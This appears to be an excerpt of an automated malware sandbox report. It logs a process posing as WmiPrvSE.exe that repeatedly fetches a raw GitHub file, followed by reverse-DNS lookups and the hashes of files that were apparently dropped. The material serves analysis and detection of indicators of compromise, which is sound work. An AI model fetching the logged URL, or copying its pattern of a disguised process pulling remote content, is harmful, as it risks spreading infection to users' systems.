X-Fastly-Request-ID: 35acf4955571c22ec29ba72af8ff951d8f3068cd
Expires: Sun, 22 Dec 2024 04:36:03 GMT
Source-Age: 47
-
185.199.110.133:443https://raw.githubusercontent.com/justbio123/raven/main/api.txttls, httpWmiPrvSE.exe914 B 5.1kB 8 9
HTTP Request
GET https://raw.githubusercontent.com/justbio123/raven/main/api.txtHTTP Response
200 -
185.199.110.133:443https://raw.githubusercontent.com/justbio123/raven/main/api.txttls, httpWmiPrvSE.exe896 B 5.1kB 8 10
HTTP Request
GET https://raw.githubusercontent.com/justbio123/raven/main/api.txtHTTP Response
200 -
185.199.110.133:443https://raw.githubusercontent.com/justbio123/raven/main/api.txttls, httpWmiPrvSE.exe897 B 5.1kB 8 9
HTTP Request
GET https://raw.githubusercontent.com/justbio123/raven/main/api.txtHTTP Response
200 -
185.199.110.133:443https://raw.githubusercontent.com/justbio123/raven/main/api.txttls, httpWmiPrvSE.exe914 B 5.1kB 8 9
HTTP Request
GET https://raw.githubusercontent.com/justbio123/raven/main/api.txtHTTP Response
200 -
185.199.110.133:443https://raw.githubusercontent.com/justbio123/raven/main/api.txttls, httpWmiPrvSE.exe861 B 5.1kB 8 10
HTTP Request
GET https://raw.githubusercontent.com/justbio123/raven/main/api.txtHTTP Response
200 -
185.199.110.133:443https://raw.githubusercontent.com/justbio123/raven/main/api.txttls, httpWmiPrvSE.exe896 B 5.1kB 8 9
HTTP Request
GET https://raw.githubusercontent.com/justbio123/raven/main/api.txtHTTP Response
200 -
185.199.110.133:443https://raw.githubusercontent.com/justbio123/raven/main/api.txttls, httpWmiPrvSE.exe914 B 5.1kB 8 9
HTTP Request
GET https://raw.githubusercontent.com/justbio123/raven/main/api.txtHTTP Response
200 -
185.199.110.133:443https://raw.githubusercontent.com/justbio123/raven/main/api.txttls, httpWmiPrvSE.exe897 B 5.1kB 8 9
HTTP Request
GET https://raw.githubusercontent.com/justbio123/raven/main/api.txtHTTP Response
200 -
185.199.110.133:443https://raw.githubusercontent.com/justbio123/raven/main/api.txttls, httpWmiPrvSE.exe896 B 5.1kB 8 9
HTTP Request
GET https://raw.githubusercontent.com/justbio123/raven/main/api.txtHTTP Response
200 -
185.199.110.133:443https://raw.githubusercontent.com/justbio123/raven/main/api.txttls, httpWmiPrvSE.exe861 B 5.1kB 8 10
HTTP Request
GET https://raw.githubusercontent.com/justbio123/raven/main/api.txtHTTP Response
200 -
185.199.110.133:443https://raw.githubusercontent.com/justbio123/raven/main/api.txttls, httpWmiPrvSE.exe861 B 5.1kB 8 9
HTTP Request
GET https://raw.githubusercontent.com/justbio123/raven/main/api.txtHTTP Response
200
-
73 B 147 B 1 1
DNS Request
104.219.191.52.in-addr.arpa
-
74 B 128 B 1 1
DNS Request
172.210.232.199.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
95.221.229.192.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
22.160.190.20.in-addr.arpa
-
73 B 159 B 1 1
DNS Request
228.249.119.40.in-addr.arpa
-
71 B 135 B 1 1
DNS Request
raw.githubusercontent.com
DNS Response
185.199.110.133185.199.111.133185.199.108.133185.199.109.133
-
74 B 118 B 1 1
DNS Request
133.110.199.185.in-addr.arpa
-
70 B 156 B 1 1
DNS Request
50.23.12.20.in-addr.arpa
-
71 B 145 B 1 1
DNS Request
206.23.85.13.in-addr.arpa
-
71 B 135 B 1 1
DNS Request
65.139.73.23.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
48.229.111.52.in-addr.arpa
-
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5baf55b95da4a601229647f25dad12878
SHA1abc16954ebfd213733c4493fc1910164d825cac8
SHA256ee954c5d8156fd8890e582c716e5758ed9b33721258f10e758bdc31ccbcb1924
SHA51224f502fedb1a305d0d7b08857ffc1db9b2359ff34e06d5748ecc84e35c985f29a20d9f0a533bea32d234ab37097ec0481620c63b14ac89b280e75e14d19fd545
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5bd5940f08d0be56e65e5f2aaf47c538e
SHA1d7e31b87866e5e383ab5499da64aba50f03e8443
SHA2562d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6
SHA512c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406
-
Filesize
944B
MD5cadef9abd087803c630df65264a6c81c
SHA1babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA5127278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085
-
Filesize
944B
MD5d28a889fd956d5cb3accfbaf1143eb6f
SHA1157ba54b365341f8ff06707d996b3635da8446f7
SHA25621e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA5120b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c
-
Filesize
944B
MD5e243a38635ff9a06c87c2a61a2200656
SHA1ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc
SHA256af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f
SHA5124418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4
-
Filesize
944B
MD55f0ddc7f3691c81ee14d17b419ba220d
SHA1f0ef5fde8bab9d17c0b47137e014c91be888ee53
SHA256a31805264b8b13ce4145f272cb2830728c186c46e314b48514d636866217add5
SHA5122ce7c2a0833f581297c13dd88ccfcd36bf129d2b5d7718c52b1d67c97cbd8fc93abc085a040229a0fd712e880c690de7f6b996b0b47c46a091fabb7931be58d3
-
Filesize
229B
MD584ed24cef940f987468cf1c769391b0a
SHA1334b50a9e076cb8a5ce16da94121aa78b4ef3a5c
SHA256caf6416bf64b9f012f1472844923614696a11e47c55a2057bf126e83cda7cce0
SHA512e3d1958fe19f56ec4ecf6697f7fc5e264917c01c794283e46b3ad74fdd0d744b0b73baaacee468435dddf6507686bb3b8edf545235a4b9bda836c34561ada3b3
-
Filesize
229B
MD504f543f930c3e650258e20224522c33a
SHA1942198747501dfc8bdd67fe50ec56564dd7b56b8
SHA2566cb93b62edf3c77202b83f6b3cb7e5c0a120c30542c0a58e8f065f0dce2468e7
SHA5126af221e5454e4323a1979d926d2850c257a0b78c22d7a8197ae2da2e94f422b15a478788f2345219db0e34aa6d7b841ce06a82ed7424a619f1ac39124abcd765
-
Filesize
229B
MD5a0e1c726c11f946e3913ab13944a4d3d
SHA1656de254437530181ca14be4fa95463840002c2b
SHA256ba5736121bcdc1f96fc04ab0de4b9eb622200544daf0f6565189b84bbbba331f
SHA512447be5f820e5c4de24ce45fb63edc5785566570c4d89139f17738fc0053563b3eaa02cccaa881760806cd11a314c880c68066793249b6be14a989aafad800bfe
-
Filesize
229B
MD557c2e17457b1bcc3afc4bd1111a10258
SHA18fc40c87530b48cdc26067c8f9c760c5d39a8165
SHA256e5bf0fd33d62aa9a09bd15c17a509513cf580333c9c5cf87ec86e020351a4aad
SHA512b684d6ffcf519bb6c3a44ae623a146bfb85f3f96785ce6abccf6d0a60484c7cc85d1dfc74259c8da1fa47fec38e1560075145f19078ebdce0046f22b5e59cc51
-
Filesize
229B
MD5d97c1ec48783a23f9decea241fb703aa
SHA1352bfa7d2861bf618ba11e60dd9e21582ddb86d0
SHA2566dad202024fbb34ac2683ed1bc781e7b791ede9af08a402829cfbd5ad76a44e3
SHA512dd1d6b8fec3d5d4faeab6fce79c2a6be7180b50974eca01b8682ef1b79f633a71cd250aef8490a4c39786b16730e57987c3e9c4ed4e050803ee91587a4f6c01a
-
Filesize
229B
MD51a581f0547eb85a52b9ac0708d2c650a
SHA14a81d7b74dc20e8b541981ce1cc8cd722f16ce18
SHA25690fcb2c9be38d805025dbe481f470bb2c985107dc7888743dedff76b9b9104fd
SHA512b8e996b42e7b5aa3f2c69b6a16e206efdd0309409197ea55f7918d00dacb973f926147bcca1fec86a87d9ad81dca6bd06b06e0a10bc78635062da6eb63d481e6
-
Filesize
229B
MD5f7e1582cb2509310eb1e7a4a425068da
SHA165983a5599051760c58716630641f90b82e88e8f
SHA2564805e93141d7ff04b4a3e8061d44352b5e645e0507fe3afa7801fe2236371c23
SHA512a30d5b7242dbac5d056fb34e37e9e1d86d5a74408543cea9b6a30caa1312eb0e9a85826339789192c97a71ba76e82cd080c071bbc94b07081e737c3280d2cd2f
-
Filesize
229B
MD5bc9b750b27aa129b20055a3e88e8184c
SHA1f4195c60057aba27f07020636f7ebca893ed9aa6
SHA256b77e5d4d2f4e3c8d70a5d2170ca0733cb9c31514edafb253f4db9aad145bcc28
SHA5120cd5c4e58730632383c81fd245a0893757e4331ff1631fc2c899f26fa518604033fff50298c4f1cf1dd789d2356efac573d0a08eb2f3701d2a58d871173b25cd
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
229B
MD534e35929ae7c7a58453e7344c1cae4c4
SHA10647ad8f6772415d6d7ac3c58e0cd778c5d7b0b5
SHA256ac81f1b6dd183cb27e94d05275909929c490e4bd3a9b9461ae88b45d1f8cc2a2
SHA5125c98958828129e96fabfe09007a58688be30673d5f5d0d83764375106ee7b657f6f558e1d37e05c42b22a3dfbba7533bb4cba36fe62b4288b0c069c63844885e
-
Filesize
229B
MD537aca9290edafdd34bf764a7c33437ec
SHA10a797fbfd8c23b3164a6b2ce75254bad5ee10901
SHA25655f7fdd8f1f03993b70becc3987d444525c6195c326d45d83953ee523fc4966f
SHA512dcebe3d4c094165132255211a59d5750321d0246bce28880827f163d38952e6b8b68cf2947c9be619a39e606f48e959da1129d148e396dd73981333a66350c0f
-
Filesize
229B
MD5ee184ddb27f612db257cb4b02ba7fe36
SHA13ad50d3e54d66142fca0e66839a9530e5c6c8ce7
SHA256c2cf0fbfcac7f423c472fb2361117942de321bff1d5f294665fc677311bfff13
SHA512fb8621bfe85e7a67d89ce08647ee629f89a604e3581d22db4c01f447d8c32621fd5d9d547d070fa527fe950ef5a18912f1e39b6f8826f6fbf9c70897fd471969
-
Filesize
229B
MD569ebe303328085602864f43ec584a166
SHA1e6f0b4cf526b12e746cd4dd732fde2d842e7be3a
SHA256355137eee0b81e411f19ebdb34282882c528d4955d1f0422395018d7a6c16577
SHA5125ca08f9ec1a15f655d400effdb09d6519fecc78128aecf38c9fffffabe25faa10ac82f8dd12701a7752f449ce16be6796cedce13e802ecf9737497b8af5dd985
-
Filesize
36B
MD56783c3ee07c7d151ceac57f1f9c8bed7
SHA117468f98f95bf504cc1f83c49e49a78526b3ea03
SHA2568ab782f0f327a2021530e7230d3aee8abbecb7eed59482a3a46e78b9e3862322
SHA512c6012d4bfac1ed14d0fd9f0eabd0e1c3d647b343db292a907b246271d52a4b7469c809db43910ddba2e8c5045f9cb3d24d0af62d363281e6cb8b39ee94a183e8
-
Filesize
1.0MB
MD5bd31e94b4143c4ce49c17d3af46bcad0
SHA1f8c51ff3ff909531d9469d4ba1bbabae101853ff
SHA256b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63
SHA512f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394
-
Filesize
197B
MD58088241160261560a02c84025d107592
SHA1083121f7027557570994c9fc211df61730455bb5
SHA2562072cc9a4a3b84d4c5178ab41c5588eea7d0103e3928e34d64f17bf97f3d1cc1
SHA51220d9369dd359315848ea30144383a0bb479d86059fdbc3b3256ac84f998193512feb3b1799ab663619920c99fe7e0ebba33ada31a3855094b956fcd351c90478